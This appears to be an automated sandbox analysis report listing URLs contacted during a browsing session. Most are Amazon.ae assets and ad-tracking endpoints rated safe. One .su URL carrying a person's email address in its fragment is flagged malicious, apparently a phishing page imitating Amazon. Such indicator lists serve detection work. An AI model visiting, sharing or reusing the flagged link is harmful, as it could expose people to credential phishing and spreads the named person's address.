                                                                                                                                                                                                eb2.3lift.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknownfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                  https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cartfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Smartwatch_1x._SY116_CB659040198_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/619NJGBXTvL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizontefalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/31J42iPc2iL._SR480,440_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR240,220_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/31OXYlKv9gL._SR480,440_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://cm.g.doubleclick.net/pixel?google_nid=a9eu&google_cm=&ex=doubleclick.net&gdpr_consent=&google_tc=false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/61OaibCCrKL._AC_SY200_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D417%26pc%3D5151%26at%3D5151%26t%3D1723729121680%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5150false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/I/01uyz9BO3mL._RC%7C01bzvM+YbkL.js,010ghrVeGXL.js,011ZAUoBkGL.js,01pfcv4RKLL.js,01QUgYbNyTL.js,01ikzOA7NuL.js,317dyAcfNdL.js,61REBL1DV8L.js,31B3HDxjAhL.js,01GHajztuJL.js,11Ff2wvxDJL.js,71-4br3F8hL.js,61gwjSycICL.js,61vZ+DrkZwL.js_.js?AUIClients/SharedShoppingCartDesktopAssetfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/61BpJ-+2UGL._AC_SY200_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/31+4pNVeyCL._SR480,440_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://ib.adnxs.com/setuid/a9?entity=188&code=yzz1lUhzR0mqhMyLk0ySdw&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DxandrHMT%26id%3D%24UID&gdpr_consent=false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://public-prod-dspcookiematching.dmxleo.com/dspreply?dspId=1868&dspUserId=bYUuYICqQsKknbsvLmRwgg&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DdailymotionHMT2&id=&gdpr_consent=false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://aax-eu.amazon-adsystem.com/s/ecm3?ex=improvedigitalHMT&id=56850dde-f521-4220-b5ea-d074c8f18e01&gdpr_consent=false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2024/img/Apparel/XCM_CUTTLE_1710103_3712474_372x232_2X_en_AE._SY116_CB560039169_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/21cxge8YxxL.AC_SX250.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/I/01DM-rg61+L.js?AUIClients/F3CollapsedCartAssetsfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Asi%26si%3D417%26pc%3D5151%26at%3D5151%26t%3D1723729121680%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5151false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D3451%26pc%3D15079%26at%3D15079%26t%3D1723729109593%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15079false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/61czlYZjf2L._AC_SY200_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://aax-eu.amazon.ae/e/xsp/imp?b=RHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf&pj=%7B%22measurementMethod%22%3A%22cod_client%22%7Dfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/I/01rdVnPkgmL._RC%7C01CzAMryqJL.css_.css?AUIClients/ListsDesktopCartMoveToListAssetsfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://dsum-sec.casalemedia.com/rrum?cm_dsp_id=198&external_user_id=9wKYsJ4CT2yWvth808m3GQ&cb=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3DindexHMT%26id%3D&gdpr_consent=false
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332325_186x116_1X_en_AE._SY116_CB597933578_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/I/51TvQK5HLrL.AC_SX250.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://www.facebook.com/fr/r.php?p=558293300959460&e=N3EFGF3vTTeRiAfcQ-KSyQ&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dfbca%26id%3DN3EFGF3vTTeRiAfcQ-KSyQ&s=1723729112&h=Njg2Nk5GelFkWnJZeTZOSGzH6NeIET6qtJz9QSkaNyDsZuMRfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/I/A1fXNtoo+RL.js?AUIClients/ACICAssetsfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_01_writing_en._CB568181090_.pngfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334867_186x116_1X_en_AE_1._SY116_CB597773556_.jpgfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://aax-eu.amazon-adsystem.com/s/v3/pr?exlist=fw_mp_n-gg-HMT2_n-cx-HMT_nsln_n-telaria&fv=1.0&a=cm&dmt=1&gdpr_consent=&ep=t0lYLix41FTrK7ny4hZcFrdz_z9ejwrwwMmktH_0a_Do5qRl2uKNhNxTiCz3PpSYnP_CapO1mDqWOYgQjwoLJ4Jn68-GUedN6ce8XMwI9EZ8lyAl-Xbocpo8xn1lMBpLyFSj9nLkg3jQhxI3zBmkZIiqQbmveUzyVIGEOHFvUtwfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D2076%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D6967%26pc%3D15080%26at%3D15080%26t%3D1723729109594%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15080false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:0RPFFN4XC9JAK0QN8ZQ4$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D0RPFFN4XC9JAK0QN8ZQ4%26ic%3D2%26m%3D1%26sc%3Dcsa%3Avl90%26vl90%3D417%26pc%3D5150%26at%3D5150%26t%3D1723729121679%26pty%3DFullPageAuthentication%26spty%3Dclaim%26pti%3Dundefined%26tid%3D0RPFFN4XC9JAK0QN8ZQ4%26aftb%3D1%26lob%3D1:5149false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://m.media-amazon.com/images/I/81B7s-7r48L._AC_SY200_.jpgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://images-eu.ssl-images-amazon.com/images/I/31bJewCvY-L.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://m.media-amazon.com/images/I/31N-r+VYSWL.jsfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://m.media-amazon.com/images/I/31qnSUxnD0L._SR480,440_.jpgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://m.media-amazon.com/images/I/61za6jnk1GL._AC_SY200_.jpgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://cm.g.doubleclick.net/pixel?google_nid=medr&google_cm&key=GOO&process_consent=T&action=GET_ID&opid=goo&etid=&domid=1106&ops=apxfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3Avl50%26vl50%3D1707%26pc%3D8133%26at%3D8133%26t%3D1723729140343%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8132false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://m.media-amazon.com/images/I/71fUZu5nc0L._AC_SY200_.jpgfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26m%3D1%26sc%3Dcsa%3Asi%26si%3D3525%26pc%3D15082%26at%3D15082%26t%3D1723729109596%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D30082653031%26tid%3D1GXSAVZ7MBDVTNT0VYNB%26aftb%3D1%26lob%3D1:15082false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26ctb%3D1%26sc0%3Dadplacements%3AsfImpression%3A3221523e-c639-400a-a04d-789177f02209%26bb0%3D4066%26pc0%3D72407%26ld0%3D72319%26t0%3DThu%20Aug%2015%202024%2009%3A39%3A07%20GMT-0400%20(Eastern%20Daylight%20Time)%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:72407false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://uipus.semasio.net/amazon/1/get?_url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsemasio%26id%3D%24%7BUIPID%28%29%7Dfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://image6.pubmatic.com/AdServer/UCookieSetPug?rd=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dpubmatic.com%26id%3D%23PM_USER_ID&gdpr_consent=&rdf=1false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://aax-eu.amazon-adsystem.com/s/ecm3?ex=index&id=L-wz6xtD89VwUjAGeNXQizc4dL44ZgACfalse
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:XRRBVETR66S3T97BM5KF$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DXRRBVETR66S3T97BM5KF%26m%3D1%26sc%3Dcsa%3Alcp%26lcp%3D2928%26pc%3D62409%26at%3D62409%26t%3D1723729137720%26csmtags%3Daui%3Asw%3Abrowser%3Aregister%3Asupported%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DXRRBVETR66S3T97BM5KF%26aftb%3D1%26lob%3D1:62410false
                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://eff.contempi.su/DJuy2C6F/#Ebkamphuis@gcgaming.comtrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images-eu.ssl-images-amazon.com/images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssetsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images-eu.ssl-images-amazon.com/images/G/39/AE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615980_3334872_186x116_1X_en_AE_3._SY116_CB597773556_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/61-jK4RR+mL._AC_SY200_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/618LrXHTM3L._AC_SY200_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.amazon.ae/service-worker.jsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images-eu.ssl-images-amazon.com/images/I/01NdXlDE17L.css?AUIClients/InContextAuthBaseAssetsfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/31iocnwzJSL._SR480,440_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_10_pens_en._CB568181090_.pngfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/71pFC0n2-AL._AC_SF226,226_QL85_.jpg?aicid=discounts-widgets-horizontefalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/61byCU9Ne1L._AC_SY200_.jpgfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://us-u.openx.net/w/1.0/cm?cc=1&id=e818ca1e-0c23-caa8-0dd3-096b0ada08b7&r=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dopenx.com%26id%3D%7BOPENX_ID%7D&gdpr_consent=false
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://eff.contempi.su/favicon.icofalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://uipus.semasio.net/amazon/1/get2?_url=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Dsemasio%26id%3D%24%7BUIPID%28%29%7Dfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                        https://www.amazon.inchromecache_893.2.dr, chromecache_509.2.drfalse
                                                                                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://unagi-na.amazon.com/1/events/com.amazon.csm.nexusclient.gammachromecache_268.2.dr, chromecache_600.2.dr, chromecache_514.2.dr, chromecache_290.2.dr, chromecache_415.2.dr, chromecache_917.2.dr, chromecache_362.2.dr, chromecache_990.2.dr, chromecache_533.2.dr, chromecache_723.2.dr, chromecache_380.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_963.2.dr, chromecache_420.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.amazon.itchromecache_893.2.dr, chromecache_509.2.drfalse
                                                                                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/01/share-icons/chromecache_289.2.drfalse
                                                                                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_03_elechromecache_533.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/11EIQ5IGqaL._RCchromecache_362.2.dr, chromecache_533.2.dr, chromecache_723.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://github.com/mozilla/source-map/issues/30chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                        • 0%, Virustotal, Browse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/41xkTNTvpwL._SR240chromecache_723.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/I/41xkTNTvpwL._SR480chromecache_362.2.dr, chromecache_723.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://issues.amazon.com/issues/KAT-1534)chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/S/sash/e0LnMbFWJC-TMQz.woff)chromecache_891.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.amazon.nlchromecache_893.2.dr, chromecache_509.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/39/consumables_uae/Amazonbasket/XCM_Manual_1532278_5307764_400x3chromecache_533.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_06_plachromecache_533.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://opensource.org/licenses/BSD-3-Clausechromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/G/01/style-snap/close-large.pngchromecache_284.2.dr, chromecache_506.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://t.corp.amazon.com/chromecache_330.2.dr, chromecache_841.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.amazon.co.ukchromecache_893.2.dr, chromecache_509.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/S/sash/prp2-N9d2Q$gDX5.gif)chromecache_891.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://blog.ameba.jpchromecache_284.2.dr, chromecache_506.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://completion.amazon.comchromecache_362.2.dr, chromecache_533.2.dr, chromecache_723.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://m.media-amazon.com/images/S/sash/5uJUWEszo9hoRiT.png);background-size:containchromecache_560.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.amazon.com.auchromecache_893.2.dr, chromecache_509.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://www.amazon.ae/a/addresses?ref_=footer_yadchromecache_362.2.dr, chromecache_533.2.dr, chromecache_723.2.dr, chromecache_853.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://stackoverflow.com/questions/11547672/how-to-stringify-event-object)chromecache_600.2.dr, chromecache_675.2.dr, chromecache_585.2.dr, chromecache_420.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://images-na.ssl-images-amazon.com/images/G/01/poppin/JavaScript/moment-timezone-with-data.min.chromecache_284.2.dr, chromecache_506.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://services.amazon.ae/services/sell-on-amazon/benefits.html?_encoding=UTF8&ld=AZAESOA&refTag=fochromecache_362.2.dr, chromecache_533.2.dr, chromecache_723.2.dr, chromecache_853.2.drfalse
